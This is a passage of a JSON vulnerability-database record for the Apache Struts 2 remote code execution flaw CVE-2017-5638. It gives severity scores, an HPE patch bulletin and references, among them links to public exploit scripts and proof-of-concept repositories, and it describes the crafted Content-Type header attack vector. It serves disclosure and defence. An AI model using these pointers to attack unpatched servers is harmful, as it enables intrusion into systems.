            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5638",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "availabilityRequirement": "NOT DEFINED",
                "baseScore": 10.0,
                "collateralDamagePotential": "NONE",
                "confidentialityImpact": "COMPLETE",
                "confidentialityRequirement": "NOT DEFINED",
                "enviromentalScore": 8.7,
                "exploitability": "HIGH",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5638",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "integrityRequirement": "NOT DEFINED",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "remediationLevel": "OFFICIAL FIX",
                "reportConfidence": "CONFIRMED",
                "severity": "HIGH",
                "targetDistribution": "HIGH",
                "trust": 1.6,
                "userInteractionRequired": null,
                "vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-5638",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-5638",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-5638",
                "trust": 1.6,
                "value": "HIGH"
              },
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-5638",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
                "id": "CVE-2017-5638",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-5638",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201703-152",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2017-5638",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. Apache Struts2 Contains a vulnerability that allows the execution of arbitrary code. Apache Struts2 In Jakarta Multipart parser A vulnerability exists in the execution of arbitrary code that could allow the execution of arbitrary code. The attack code for this vulnerability has been released.By processing a request crafted by a remote third party, arbitrary code could be executed with the privileges of the application. \nApache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03723en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03723en_us\nVersion: 1\n\nHPESBHF03723 rev.1 - HPE Aruba ClearPass Policy Manager, using Apache Struts,\nRemote Code Execution\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-03-29\nLast Updated: 2017-03-29\n\nPotential Security Impact: Remote: Code Execution\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified in HPE Aruba ClearPass\nPolicy Manager. \n\n**Note:** The ClearPass Policy Manager administrative Web interface is\naffected by the vulnerability. ClearPass Guest, Insight, and Graphite are NOT\nimpacted. \n\n  - Aruba ClearPass Policy Manager All versions prior to 6.6.5\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2017-5638\n      9.4 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n      9.7 (AV:N/AC:L/Au:N/C:C/I:C/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE Aruba has provided hotfixes for ClearPass 6.6.5, 6.6.4, and 6.5.7. Use\none of the following methods to install the appropriate hotfix:\n\nInstall the Hotfix Online Using the Software Updates Portal:\n \n   1. Open ClearPass Policy Manager and go to Administration - Agents and\nSoftware\n   Updates - Software Updates.  \n   \n   2. In the Firmware and Patch Updates area, find the \"ClearPass 6.5.7\nHotfix\n   Patch for CVE-2017-5638\" or \"ClearPass 6.6.4 Hotfix Patch for\nCVE-2017-5638\"\n   patch and click the Download button in its row. \n    \n   3. Click Install.  \n   \n   4. When the installation is complete and the status is shown as \"Needs\n   Restart\", proceed to restart ClearPass. After reboot, the status for the\n   patch will be shown as Installed. The ClearPass Policy Manager version\n   number will not change.  \n\n   \nInstalling the hotfix Offline Using the Patch File from\nsupport.arubanetworks.com:\n \n   1. Download the \"ClearPass 6.5.7 Hotfix Patch for CVE-2017-5638\" or\n   \"ClearPass 6.6.4 Hotfix Patch for CVE-2017-5638\" patch from the Support\nsite. \n     \n   2. Open the ClearPass Policy Manager Admin UI and go to Administration -\n   Agents and Software Updates - Software Updates.  \n   3. At the bottom of the Firmware and Patch Updates area, click Import\nUpdates\n   and browse to the downloaded patch file. The name and description once\n   imported may differ from the name and remark on the support site\n   as these were adjusted after posting. This is purely a cosmetic\ndiscrepancy.  \n   \n   4. Click Install.  \n   \n   5. When the installation is complete and the status is shown as Needs\nRestart,\n   proceed to restart ClearPass. After reboot, the status for the patch will\n   be shown as Installed. The ClearPass Policy Manager version number will\n   not change.  \n\n\nWorkarounds\n- ----------- \nRestrict access to the Policy Manager Admin Web Interface. This can be\naccomplished by navigating to Administration - Server Manager -\nServer Configuration - Server-Name - Network - Restrict Access and\nonly allowing non-public or network management networks. \n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 29 March 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQEcBAEBCAAGBQJY3BR/AAoJELXhAxt7SZaiMW8H/0+jWL4Evk+KeqP7aYk1msGp\n9ih3F2680VrHVsUbSzul3+svnaWTJUgRe7fUTvsh/Q6bx/Eo86yo8iXGjmzETLtY\ncTuQrHLySo55Pwua9+89V4e13QkRvQ/UmQPYDMPEk9L7wwU9OF0oCpXHQBuWnw07\nmKLZ12HaZqM8vJXgwgJFH77Mf3r5TkGFHsrZ0M+2vvxioJIEfmWV/x4eqtvIy6zS\nC6CX1M9x4xD442XcFfnH0BHA9RL6LOeYngTPYR7IIycvzpqd8kOWunjs38+IJpFR\ng49ho/NddeZfDKdJcIdfJ+0f3x2h7FPiVadXu1PzdCckhFHkHmrSlVcRbQZ+1R8=\n=8ljI\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "BID",
            "id": "96729"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "db": "PACKETSTORM",
            "id": "142055"
          },
          {
            "db": "PACKETSTORM",
            "id": "141863"
          }
        ],
        "trust": 3.6
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.kb.cert.org/vuls/id/834067",
            "trust": 1.6,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41570",
            "trust": 0.2,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-5638",
            "trust": 4.6
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067",
            "trust": 4.3
          },
          {
            "db": "EXPLOIT-DB",
            "id": "41570",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "96729",
            "trust": 1.9
          },
          {
            "db": "EXPLOIT-DB",
            "id": "41614",
            "trust": 1.6
          },
          {
            "db": "SECTRACK",
            "id": "1037973",
            "trust": 1.6
          },
          {
            "db": "LENOVO",
            "id": "LEN-14200",
            "trust": 1.6
          },
          {
            "db": "PACKETSTORM",
            "id": "141494",
            "trust": 1.6
          },
          {
            "db": "JVN",
            "id": "JVNVU93610402",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5638",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "142055",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "141863",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "db": "BID",
            "id": "96729"
          },
          {
            "db": "PACKETSTORM",
            "id": "142055"
          },
          {
            "db": "PACKETSTORM",
            "id": "141863"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "id": "VAR-201703-0755",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2025-11-18T15:18:06.225000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "WW-3025",
            "trust": 0.8,
            "url": "https://issues.apache.org/jira/browse/WW-3025"
          },
          {
            "title": "Alternate Libraries",
            "trust": 0.8,
            "url": "https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries"
          },
          {
            "title": "S2-045: Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser.",
            "trust": 0.8,
            "url": "https://struts.apache.org/docs/s2-045.html"
          },
          {
            "title": "Uses default error key if specified key doesn\u0027t exist (3523064)",
            "trust": 0.8,
            "url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a"
          },
          {
            "title": "Uses default error key if specified key doesn\u0027t exist (6b8272c)",
            "trust": 0.8,
            "url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228"
          },
          {
            "title": "Content-Type: Malicious - New Apache Struts2 0-day Under Attack",
            "trust": 0.8,
            "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"
          },
          {
            "title": "hitachi-sec-2017-110",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-110/index.html"
          },
          {
            "title": "NV17-013",
            "trust": 0.8,
            "url": "http://jpn.nec.com/security-info/secinfo/nv17-013.html"
          },
          {
            "title": "hitachi-sec-2017-110",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/hitachi-sec-2017-110/index.html"
          },
          {
            "title": "Veritas NetBackup: \u4efb\u610f\u306e\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3055\u308c\u308b\u8106\u5f31\u6027(CVE-2017-5638) (2017\u5e749\u67081\u65e5)",
            "trust": 0.8,
            "url": "http://www.fujitsu.com/jp/products/software/resources/condition/security/products-fujitsu/solution/veritas201712.html"
          },
          {
            "title": "Apache Struts 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=67948"
          },
          {
            "title": "Cisco: Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability Affecting Cisco Products",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20170310-struts2"
          },
          {
            "title": "CVE-2017-5638",
            "trust": 0.1,
            "url": "https://github.com/readloud/CVE-2017-5638 "
          },
          {
            "title": "cve-2017-5638",
            "trust": 0.1,
            "url": "https://github.com/jrrdev/cve-2017-5638 "
          },
          {
            "title": "apache-struts-v2-CVE-2017-5638",
            "trust": 0.1,
            "url": "https://github.com/cafnet/apache-struts-v2-CVE-2017-5638 "
          },
          {
            "title": "struts-vulnerability-demo",
            "trust": 0.1,
            "url": "https://github.com/corpbob/struts-vulnerability-demo "
          },
          {
            "title": "struts2_cve-2017-5638",
            "trust": 0.1,
            "url": "https://github.com/m3ssap0/struts2_cve-2017-5638 "
          },
          {
            "title": "struts-rce-cve-2017-5638",
            "trust": 0.1,
            "url": "https://github.com/riyazwalikar/struts-rce-cve-2017-5638 "
          },
          {
            "title": "equifax-data-breach",
            "trust": 0.1,
            "url": "https://github.com/raul23/equifax-data-breach "
          },
          {
            "title": "CVE-2017-5638",
            "trust": 0.1,
            "url": "https://github.com/colorblindpentester/CVE-2017-5638 "
          },
          {
            "title": "struts2-rce",
            "trust": 0.1,
            "url": "https://github.com/sotudeko/struts2-rce "
          },
          {
            "title": "vuln-struts2-vm",
            "trust": 0.1,
            "url": "https://github.com/evolvesecurity/vuln-struts2-vm "
          },
          {
            "title": "Apache-Struts-2-CVE-2017-5638-Exploit",
            "trust": 0.1,
            "url": "https://github.com/dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit "
          },
          {
            "title": "struts2-rce",
            "trust": 0.1,
            "url": "https://github.com/rjd3/struts2-rce "
          },
          {
            "title": "Struts2-045-RCE",
            "trust": 0.1,
            "url": "https://github.com/RayScri/Struts2-045-RCE "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-755",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-20",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.5,
            "url": "https://cwiki.apache.org/confluence/display/ww/s2-045"
          },
          {
            "trust": 3.2,
            "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"
          },
          {
            "trust": 3.2,
            "url": "https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/"
          },
          {
            "trust": 3.2,
            "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/"
          },
          {
            "trust": 2.7,
            "url": "https://www.kb.cert.org/vuls/id/834067"
          },
          {
            "trust": 1.9,
            "url": "https://github.com/rapid7/metasploit-framework/issues/8064"
          },
          {
            "trust": 1.6,
            "url": "https://github.com/rapid7/metasploit-framework/issues/8064 "
          },
          {
            "trust": 1.6,
            "url": "https://www.exploit-db.com/exploits/41570/"
          },
          {
            "trust": 1.6,
            "url": "https://cwe.mitre.org/data/definitions/94.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2017-002.txt"
          },
          {
            "trust": 1.6,
            "url": "https://cwiki.apache.org/confluence/display/ww/s2-046"
          },
          {
            "trust": 1.6,
            "url": "http://www.securityfocus.com/bid/96729"
          },
          {
            "trust": 1.6,
            "url": "https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/"
          },
          {
            "trust": 1.6,
            "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa145"
          },
          {
            "trust": 1.6,
            "url": "https://exploit-db.com/exploits/41570"
          },
          {
            "trust": 1.6,
            "url": "https://packetstormsecurity.com/files/141494/s2-45-poc.py.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
          },
          {
            "trust": 1.6,
            "url": "https://github.com/mazen160/struts-pwn"
          },
          {
            "trust": 1.6,
            "url": "https://support.lenovo.com/us/en/product_security/len-14200"
          },
          {
            "trust": 1.6,
            "url": "https://struts.apache.org/docs/s2-046.html"
          },
          {
            "trust": 1.6,
            "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03733en_us"
          },
          {
            "trust": 1.6,
            "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03723en_us"
          },
          {
            "trust": 1.6,
            "url": "https://security.netapp.com/advisory/ntap-20170310-0001/"
          },
          {
            "trust": 1.6,
            "url": "https://twitter.com/theog150/status/841146956135124993"
          },
          {
            "trust": 1.6,
            "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03749en_us"
          },
          {
            "trust": 1.6,
            "url": "https://www.exploit-db.com/exploits/41614/"
          },
          {
            "trust": 1.6,
            "url": "https://struts.apache.org/docs/s2-045.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.securitytracker.com/id/1037973"
          },
          {
            "trust": 1.6,
            "url": "https://isc.sans.edu/diary/22169"
          },
          {
            "trust": 1.0,
            "url": "https://git1-us-west.apache.org/repos/asf?p=struts.git%3ba=commit%3bh=6b8272ce47160036ed120a48345d9aa884477228"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3cannounce.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3cannounce.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2017-5638"
          },
          {
            "trust": 1.0,
            "url": "https://git1-us-west.apache.org/repos/asf?p=struts.git%3ba=commit%3bh=352306493971e7d5a756d61780d57a76eb1f519a"
          },
          {
            "trust": 1.0,
            "url": "https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3cannounce.apache.org%3e"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5638"
          },
          {
            "trust": 0.8,
            "url": "https://www.ipa.go.jp/security/ciadr/vul/20170308-struts.html"
          },
          {
            "trust": 0.8,
            "url": "https://www.jpcert.or.jp/at/2017/at170009.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu93610402/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5638"
          },
          {
            "trust": 0.6,
            "url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3cannounce.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3cannounce.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3cannounce.apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "http-vuln-cve2017-5638.html"
          },
          {
            "trust": 0.6,
            "url": "https://nmap.org/nsedoc/scripts/"
          },
          {
            "trust": 0.6,
            "url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a"
          },
          {
            "trust": 0.6,
            "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170316-01-struts2-cn"
          },
          {
            "trust": 0.4,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03733en_us"
          },
          {
            "trust": 0.3,
            "url": "http://www.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "https://confluence.atlassian.com/bamboo/bamboo-security-advisory-2017-03-10-876857850.html"
          },
          {
            "trust": 0.3,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1430326"
          },
          {
            "trust": 0.3,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170310-struts2"
          },
          {
            "trust": 0.3,
            "url": "https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html"
          },
          {
            "trust": 0.3,
            "url": "https://confluence.atlassian.com/display/hc/hipchat+server+security+advisory+2017-03-09"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03749en_us"
          },
          {
            "trust": 0.3,
            "url": "http://www.huawei.com/en/psirt/security-notices/2017/huawei-sn-20170313-01-struts2-en"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg22000444"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg22001736"
          },
          {
            "trust": 0.3,
            "url": "http://www.vmware.com/security/advisories/vmsa-2017-0004.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5638"
          },
          {
            "trust": 0.2,
            "url": "http://www.hpe.com/support/security_bulletin_archive"
          },
          {
            "trust": 0.2,
            "url": "https://www.hpe.com/info/report-security-vulnerability"
          },
          {
            "trust": 0.2,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
          },
          {
            "trust": 0.2,
            "url": "http://www.hpe.com/support/subscriber_choice"
          },
          {
            "trust": 0.1,
            "url": "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03723en_us"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "BID",
            "id": "96729"
          },
          {
            "db": "PACKETSTORM",
            "id": "142055"
          },
          {
            "db": "PACKETSTORM",
            "id": "141863"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "db": "BID",
            "id": "96729"
          },
          {
            "db": "PACKETSTORM",
            "id": "142055"
          },
          {
            "db": "PACKETSTORM",
            "id": "141863"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
